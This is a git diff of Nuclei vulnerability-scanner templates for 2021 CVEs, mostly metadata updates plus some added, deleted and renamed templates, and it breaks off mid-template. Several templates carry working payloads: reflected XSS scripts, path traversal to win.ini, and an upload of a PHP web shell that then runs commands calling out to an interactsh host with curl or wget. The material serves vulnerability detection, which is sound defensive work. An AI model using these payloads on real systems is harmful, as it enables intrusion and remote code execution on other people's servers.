dhiyaneshDK severity: medium - description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2. + description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. + remediation: | + Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643 + - https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34643 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-34643 cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated + epss-score: 0.00116 + epss-percentile: 0.44405 + cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: skaut-bazar_project + product: skaut-bazar + framework: wordpress + tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,skaut-bazar_project,xss -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -25,12 +40,10 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/options-general.php//?page=skatubazar_option HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -38,11 +51,12 @@ requests: words: - "" - - type: status - status: - - 200 - - type: word part: header words: - "text/html" + + - type: status + status: + - 200 +# digest: 490a0046304402206d3a11c0c355a2d754828a3bf9cb67c195bd89e335c164e6c70ff16f69226d9202202f501c665407d0e31660af7d953a8a91410f52a5b28a21f28bf895b7b18f7977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35250.yaml b/nuclei-templates/CVE-2021/CVE-2021-35250.yaml index 322a695f4f..2f70ac4c8c 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35250.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35250.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further attacks. remediation: Resolved in Serv-U 15.3 Hotfix 1. reference: - https://github.com/rissor41/SolarWinds-CVE-2021-35250 @@ -18,15 +20,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-35250 cwe-id: CWE-22 - epss-score: 0.05691 - epss-percentile: 0.92524 + epss-score: 0.05835 + epss-percentile: 0.93245 cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:* metadata: max-request: 1 vendor: solarwinds product: serv-u shodan-query: product:"Rhinosoft Serv-U httpd" - tags: cve,cve2021,solarwinds,traversal + tags: cve2021,cve,solarwinds,traversal http: - raw: @@ -47,4 +49,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022100d68d60608d08e485d8a281248055456c1c4a3dd5e09078b5550f64c944dcf1500220137cfd15836fea3be79e6bc7bb265863fb925f6d82c653967abdb563b88c9171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200620000d186c36d678271b33d3f8ab02fa3ece06cd95c0344ba841a95c9659f802201309537d97e91561f1fd81ac4850c36eca8c4bf67806545f58635619957ea31a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35323.yaml b/nuclei-templates/CVE-2021/CVE-2021-35323.yaml index b7197db878..d021d01f7b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35323.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35323.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-35323 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55492 + epss-percentile: 0.55601 cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: bludit product: bludit shodan-query: title:"Bludit" - tags: cve,cve2021,bludit,xss + tags: cve2021,cve,bludit,xss http: - raw: @@ -56,4 +56,4 @@ http: regex: - 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"' internal: true -# digest: 4a0a0047304502203d8207daffbe09abc286d385b724dedd353d2a20f0705d03996c581d35f64fc6022100d8b0566813d6a27366e774ead09faec475991ef1982b8d1619e3d07bd48bdfd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032cea10cfe2c27c8f06a3a4d1af7a5f3386caf73473c6483fd0df3b4bea40945022100919da458a0416cd6205d3f542c2f118ce6764e45d01de619621fb1db132866e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35380.yaml b/nuclei-templates/CVE-2021/CVE-2021-35380.yaml index f417f382fc..b596169069 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35380.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35380.yaml @@ -6,18 +6,31 @@ info: severity: high description: | TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server. reference: - https://www.swascan.com/solari-di-udine/ - https://www.exploit-db.com/exploits/50638 - https://nvd.nist.gov/vuln/detail/CVE-2021-35380 + - https://www.swascan.com/it/security-blog/ + - https://github.com/anonymous364872/Rapier_Tool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-35380 cwe-id: CWE-22 - tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb + epss-score: 0.23467 + epss-percentile: 0.96147 + cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: solari + product: termtalk_server + tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari -requests: +http: - method: GET path: - "{{BaseURL}}/file?valore=../../../../../windows/win.ini" @@ -30,5 +43,4 @@ requests: - "fonts" - "extensions" condition: and - -# Enhanced by mp on 2023/01/15 +# digest: 490a0046304402201049687d7055f539322e4410a7114608b1866683ac30c589fc9f8b1207b39bac022031fcf5d29996d0c09d94724b89f5f871ca1112d0c801d367951c80f2f395de11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35395.yaml b/nuclei-templates/CVE-2021/CVE-2021-35395.yaml index 649cf5e26e..b585dcd25f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35395.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35395.yaml @@ -17,13 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35395 epss-score: 0.97119 - epss-percentile: 0.99731 + epss-percentile: 0.99744 cpe: cpe:2.3:a:realtek:realtek_jungle_sdk:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: realtek product: realtek_jungle_sdk - tags: cve,cve2021,realtek,rce,kev + tags: cve2021,cve,realtek,rce,kev http: - raw: @@ -45,4 +45,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a00483046022100cbcd3f563e1f116189e8e2abdfc08c9a4e5984d9129cf5a795a5df5e09fce7bd022100df12ee5a37701340c9dd9549823f71eb474c62a773412804f3a53bb4e56f9284:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f282350954f899ddbf62874c49a1c8297dfe332dae61b46c09d5fce43904bf4022100861f33e914b3543cccbec18fe3c283f7a6a028d5f52c9691c9f397c000c41ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35488.yaml b/nuclei-templates/CVE-2021/CVE-2021-35488.yaml index 7f2146bdea..bb60f03561 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-35488.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-35488.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.gruppotim.it/redteam - https://www.thruk.org/changelog.html - https://nvd.nist.gov/vuln/detail/CVE-2021-35488 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-35488 cwe-id: CWE-79 + epss-score: 0.00145 + epss-percentile: 0.49429 + cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: thruk + product: thruk shodan-query: http.html:"Thruk" - verified: "true" - tags: cve,cve2021,thruk,xss + tags: cve2021,cve,thruk,xss -requests: +http: - method: GET path: - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -36,5 +48,4 @@ requests: - type: status status: - 401 - -# Enhanced by md on 2022/09/08 +# digest: 4a0a00473045022055819e8cdb5dcdc004233f8a173514f660c7708e98c66aa9920871ec2ca70969022100a7fabd08928656f2dce44bc87916e1e6d23fbe29309f0dff542373be9cf5b065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-35587.yaml b/nuclei-templates/CVE-2021/CVE-2021-35587.yaml deleted file mode 100644 index 45458baebe..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-35587.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2021-35587 - -info: - name: Pre-auth RCE in Oracle Access Manager - author: cckuailong - description: | - Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. - severity: critical - reference: - - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 - - https://nvd.nist.gov/vuln/detail/CVE-2021-35587 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-35587 - cwe-id: CWE-502 - metadata: - fofa-query: body="/oam/pages/css/login_page.css" - tags: cve,cve2021,oam,rce,java,unauth,oracle - -requests: - - method: GET - path: - - '{{BaseURL}}/oam/server/opensso/sessionservice' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "x-oracle-dms-ecid" - - "x-oracle-dms-rid" - condition: or - case-insensitive: true - - - type: word - part: body - words: - - "/oam/pages/css/general.css" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-36356.yaml b/nuclei-templates/CVE-2021/CVE-2021-36356.yaml index 8dbb5f01fd..fc0224ed28 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-36356.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-36356.yaml @@ -1,35 +1,21 @@ id: CVE-2021-36356 - info: name: Kramer VIAware - Remote Code Execution author: gy741 severity: critical description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. - remediation: | - Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface. reference: - https://www.exploit-db.com/exploits/50856 - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 - https://nvd.nist.gov/vuln/detail/CVE-2021-35064 - https://write-up.github.io/kramerav/ - - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - epss-score: 0.90558 - epss-percentile: 0.98752 - cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: kramerav - product: viaware - tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav -variables: - useragent: "{{rand_base(6)}}" - -http: + tags: rce,viaware,cve,cve2021,kramer +requests: - raw: - | POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 @@ -38,18 +24,12 @@ http: radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php - | - GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1 + GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1 Host: {{Hostname}} - - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol words: - - http + - "http" - - type: word - part: interactsh_request - words: - - "User-Agent: {{useragent}}" -# digest: 490a0046304402207d315039be7b2374857658abe5c9080339493506959d103b741bd2b02930cb020220187d49b26985f25c39c9ba0317f1b0bf0540895f0ee8e3b35b33f10f2b8e4c86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml b/nuclei-templates/CVE-2021/CVE-2021-36450.yaml new file mode 100644 index 0000000000..7220501c25 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-36450.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-36450 +info: + name: Verint 15.2 - Cross Site Scripting + author: atomiczsec + severity: medium + description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter. + reference: + - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 + - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 + - http://verint.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-36450 + cwe-id: CWE-79 + metadata: + shodan-query: title:"Verint Sign-in" + verified: "true" + tags: cve,cve2021,xss,verint +requests: + - raw: + - | + GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 + Host: {{Hostname}} + - | + POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} + redirects: true + max-redirects: 2 + cookie-reuse: true + extractors: + - type: regex + part: header + internal: true + name: csrfp_login + group: 1 + regex: + - 'csrfp_login=([a-zA-Z0-9]+);' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">

Test

26" class="loginUserNameText' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-3654.yaml b/nuclei-templates/CVE-2021/CVE-2021-3654.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3654.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3654.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-36580.yaml b/nuclei-templates/CVE-2021/CVE-2021-36580.yaml index 1692211224..a64f0801ce 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-36580.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-36580.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Apply the latest security patches or updates provided by IceWarp to fix the open redirect vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-36580 cwe-id: CWE-601 - epss-score: 0.00162 - epss-percentile: 0.52809 + epss-score: 0.00233 + epss-percentile: 0.60652 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: icewarp product: icewarp_server shodan-query: title:"icewarp" - tags: cve,cve2021,icewarp,redirect + tags: cve2021,cve,icewarp,redirect http: - method: GET @@ -40,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100ef5b5887a6afe9c90bbba13d03f66dff2cb5ea6b90cb882053d3ff6af066a68c022052e701fcd6f081450a3c0ab8fb37f17f625c36ba72ce590f2a616917ebc00a76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fb7d9f7f3b4cc99c307df40e242a485cec4ec2e1825cb4321b536061d94e5200221009cde712c4679e05357975cbc11bd9caaabcc6fe2ecf21d3d796c06da80f6ed32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-36749.yaml b/nuclei-templates/CVE-2021/CVE-2021-36749.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-36749.yaml rename to nuclei-templates/CVE-2021/CVE-2021-36749.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-36873.yaml b/nuclei-templates/CVE-2021/CVE-2021-36873.yaml index 447b33a1a0..bbc1002cf2 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-36873.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-36873.yaml @@ -6,21 +6,31 @@ info: severity: medium description: | WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress iQ Block Country plugin (>=1.2.12) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/ba93f085-2153-439b-9cda-7c5b09d3ed58 - https://wordpress.org/plugins/iq-block-country/ - https://patchstack.com/database/vulnerability/iq-block-country-/wordpress-iq-block-country-plugin-1-2-11-authenticated-persistent-cross-site-scripting-xss-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2021-36873 + - https://wordpress.org/plugins/iq-block-country/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-36873 cwe-id: CWE-79 + epss-score: 0.00131 + epss-percentile: 0.47179 + cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,wp-plugin,iq-block-country,cve2021,wordpress,wp,xss,authenticated,wpscan + verified: true + max-request: 4 + vendor: webence + product: iq_block_country + framework: wordpress + tags: cve,cve2021,wp-plugin,iq-block-country,wordpress,wp,xss,authenticated,wpscan,webence -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -28,28 +38,23 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on - - | GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - - contains(all_headers_4, "text/html") + - contains(header_4, "text/html") - status_code_4 == 200 - contains(body_4, 'blockcountry_blockmessage\">test') - contains(body_4, '

Block type

') @@ -62,5 +67,4 @@ requests: regex: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true - -# Enhanced by mp on 2022/09/28 +# digest: 490a004630440220684766e6e255bb9e4afa32a94b1ca2dc955141bb09fed41190b572538a9c5c2d02201338c2a3689ac3cc0f55a9edc41183f9d05cac1325b267cd51aa3d1c282ea228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-36880.yaml b/nuclei-templates/CVE-2021/CVE-2021-36880.yaml index e7a7e6d39a..cac0f9d642 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-36880.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-36880.yaml @@ -1,31 +1,46 @@ id: CVE-2021-36880 info: - name: uListing < 2.0.4 - Unauthenticated SQL Injection - author: akincibor + name: > + Listing, Classified Ads & Business Directory – uListing <= 2.0.3 - Unauthenticated SQL Injection + author: topscoder severity: critical - description: The plugin does not validate and escape user input leading to an unauthenticated SQL injection issue. + description: > + Unauthenticated SQL Injection (SQLi) vulnerability in WordPress uListing plugin (versions <= 2.0.3), vulnerable parameter: custom. reference: - - https://wpscan.com/vulnerability/7b32e28e-9092-4ecc-95d0-a2b9464b4a9c - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/87d153df-93b0-40a3-b119-9fad41fbd0ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-36880 + metadata: + fofa-query: "wp-content/plugins/ulisting/" + google-query: inurl:"/wp-content/plugins/ulisting/" + shodan-query: 'vuln:CVE-2021-36880' + tags: cve,wordpress,wp-plugin,ulisting,critical -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/ulisting/README.txt' + - "{{BaseURL}}/wp-content/plugins/ulisting/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: @@ -35,9 +50,9 @@ requests: - type: word words: - - "uListing" + - "ulisting" part: body - type: dsl dsl: - - compare_versions(version, '< 2.0.4') \ No newline at end of file + - compare_versions(version, '<= 2.0.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-37304.yaml b/nuclei-templates/CVE-2021/CVE-2021-37304.yaml index 0ff4984a8e..b104b46306 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-37304.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-37304.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the application. remediation: | Upgrade Jeecg Boot to a version higher than 2.4.5 to mitigate the vulnerability. reference: @@ -16,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-37304 cwe-id: CWE-732 - epss-score: 0.00879 - epss-percentile: 0.80625 + epss-score: 0.00703 + epss-percentile: 0.79899 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" - tags: cve,cve2021,jeecg,exposure + tags: cve2021,cve,jeecg,exposure http: - method: GET @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eda8ecb770ddcf5f44a01a37e1fd360ce59e3b4185740f3024680329e4a09fbc022100fd5484fac3810222b19757fe34e6c1e353e2aecfca61a8eef69d40c6ca405217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022079aca011c64f9f42174da4c2ac2e79327a3b7f9cb9ec87b19a1d1622f87e55f9022100c5af542979ec21dec828b8bd3914169cb6e954bef293666dacc6840bc35c6993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-37305.yaml b/nuclei-templates/CVE-2021/CVE-2021-37305.yaml index e22366a26d..cedd33c523 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-37305.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-37305.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to unauthorized access or data leakage. remediation: | Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability. reference: @@ -16,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-37305 cwe-id: CWE-732 - epss-score: 0.00278 - epss-percentile: 0.64816 + epss-score: 0.00416 + epss-percentile: 0.73616 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: product: jeecg shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" - tags: cve,cve2021,jeecg,exposure + tags: cve2021,cve,jeecg,exposure http: - method: GET @@ -51,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220514fdd1395bfaf1f96b57bae1e793da52e97ecd8fa365204f8937a774e3d98af022100fe04d661a8b30e120f6c5311c61bfc6b726e95e65df4eb2d92e6bc0fdbe290b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a660859c711b126edb6415cc095e15cfdcb553cef27e02ccc482c2310f22fa5022044fb232b8a52e45910c5e030ec95e0488cdef0e8ee9ad6fa6245217f4879d18b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-37416.yaml b/nuclei-templates/CVE-2021/CVE-2021-37416.yaml new file mode 100644 index 0000000000..3f2ac17b38 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-37416.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-37416 +info: + name: Zoho ManageEngine ADSelfService Plus - Reflected XSS + author: edoardottt + severity: medium + description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37416 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ManageEngine" + verified: true + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + tags: cve,cve2021,zoho,xss +requests: + - method: GET + path: + - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + matchers-condition: and + matchers: + - type: status + status: + - 